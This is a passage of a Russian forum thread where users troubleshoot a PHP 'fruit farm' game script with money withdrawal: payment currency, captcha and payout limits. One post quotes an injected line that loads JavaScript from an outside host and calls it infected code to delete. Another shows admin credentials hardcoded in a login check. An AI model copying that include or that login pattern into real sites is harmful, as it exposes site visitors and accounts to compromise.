Скрипт Фруктовая ферма с выводом денег.

• Автор темы admin
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
revofenomen
Участник
Реакции
3
  • #3.621
perforator1994 написал(а):
Поменяй платежную систему (или поставь на доллары) а сам сайт настрой под доллар
можно поподробней как это сделать?

Hiferma
Участник
Реакции
51
  • #3.622
PimoSik написал(а):
Вот файлик, спасибо сейчас будет :)
У вас не проходит проверка АПИ. Проверьте правильность подключение пейера АПИ.
И второе где вы берете инфицированные файлы. На этом форуме выложены нормальные, Используйте их за основу.
У вас строчка
echo "<script type=\"text/javascript\" src=\"http://wwes.ru/license.php\"></script><center><font color = 'green'><b>Выплачено!</b></font></center><BR />";
удалите её. Она не из скрипта. и сайта на который она ссылается нет. Вы хоть чуточку проверяйте что используете

perforator1994
Местный
Реакции
2
  • #3.623
На странице приема платежей поставить прием платежей допустим Perfect Money USD или webmoney WMZ, затем настроить сами магазины для приема, что бы платежи добавлялись в БД, затем на выплату прописать не RUR а USD например выводим доллар на вебмани: кошелек и WMU. И подсчитать эквивалентно рубля игровую валюту.

revofenomen
Участник
Реакции
3
  • #3.624
На странице приема платежей поставить прием платежей допустим Perfect Money USD или webmoney WMZ, затем настроить сами магазины для приема, что бы платежи добавлялись в БД, затем на выплату прописать не RUR а USD например выводим доллар на вебмани: кошелек и WMU. И подсчитать эквивалентно рубля игровую валюту.
мне что б паэр принимал долары

Hiferma
Участник
Реакции
51
  • #3.625
PimoSik написал(а):
ПОМОГИТЕ! Как сделать кнб БАЛЛЫ и аукцион БАЛЛЫ, сам не могу :(
В долгу не останусь!
Могу помочь. пиши в личку.

juranja
Местный
Реакции
5
  • #3.626
по плводу моегл вопроса кто вкурсе, не отображается капча, в тикет хостинга написал жду ответа, мож у кого было такое

perforator1994
Местный
Реакции
2
  • #3.627
капча при регистрации или при входе?

juranja
Местный
Реакции
5
  • #3.628
капча при регистрации или при входе?
регистрация и восстановление пароляя

perforator1994
Местный
Реакции
2
  • #3.629
попробуй перезалить этот файл

Вложения

juranja
Местный
Реакции
5
  • #3.630
попробуй перезалить этот файл
не помогло тоже самое какие будут варианты?? недели три назад в гугле видел подобное не придал значения а теперь не могу найти

Hiferma
Участник
Реакции
51
  • #3.631
juranja написал(а):
не помогло тоже самое какие будут варианты?? недели три назад в гугле видел подобное не придал значения а теперь не могу найти
У тебя http или https
На втором капча не работает, её надо переписывать

juranja
Местный
Реакции
5
  • #3.632
Hiferma написал(а):
У тебя http или https
На втором капча не работает, её надо переписывать
не понял немножко по подробней пожалуйста

juranja
Местный
Реакции
5
  • #3.635
Gheegle
Участник
Реакции
0
  • #3.636
Привет всем! Я новичок в этом деле, но у меня уже есть домен и хостинг. Я установил скрипт, подключил его к БД, но, когда я пытаюсь с главной страницы перейти на какую-либо другую, (новости, регистрация и прочее) этого не происходит, а вылазит предупреждение "Запрашиваемая Вами страница не существует.", хотя весь скрипт я залил на сайт. Помогите, пожалуйста!

gveld
Участник
Реакции
0
  • #3.637
gipnomag написал(а):
Поставил на админку пароль как советовал wh1skas:
В папке admin есть файл login

Приведите код к следующему виду:

if(strtolower($_POST["admlogin"]) == strtolower("Впиши_Логин_Админа") AND strtolower($_POST["admpass"]) == strtolower("А_ТУТ_ПАРОЛЬ") ){

теперь возникает второй вопрос, а как защититься от взлома пользователей, ведь по идее, если взломщик не может получить доступ к админке, он в любой момент может вытянуть пароли пользователей с базы. Поможет ли в этом случае платёжный пароль или что то другое надо ставить.
Что-то мне подсказывает, что таким вариантом вписывания мы просто даём в руки пароль и логин, на-те берите.

gveld
Участник
Реакции
0
  • #3.638
Hiferma написал(а):
Всё очень просто делается. Делаешь проверку На наличие выплат за 24 часа, если ты хочешь чтобы не больше максимальной суммы за 24, тогда делаешь проверку на сумму выплат за 24 часа и вставляешь эту проверку перед выплатой и всё. Код я приводил на этом форуме, но из этических соображений удалил. Всего 8 строчек написать надо.
Вставлял я эту прроверку, -
### Устанавливаем лимит на 24 часа по выплатам для $USIDif ($frompayments["date_add"] <= time() - $nd_time * 86400) { скрипт ломается и страница не работает белая.

wh1skas
wildcake
Участник
Реакции
432
  • #3.639
потому что на этом не останавливается обработка скрипта, ты запустил цикл и открыл скобку {

А закрывающую не добавил, там где положено. Вот и не работает ничего.

gveld
Участник
Реакции
0
  • #3.640
wh1skas написал(а):
потому что на этом не останавливается обработка скрипта, ты запустил цикл и открыл скобку {

А закрывающую не добавил, там где положено. Вот и не работает ничего.
Я копировал всю середину того скрипта себе, страница работает, но пишет что неправильный номер кошеля вставляю.А там всё верно было.

Статус
В этой теме нельзя размещать новые ответы.
Сверху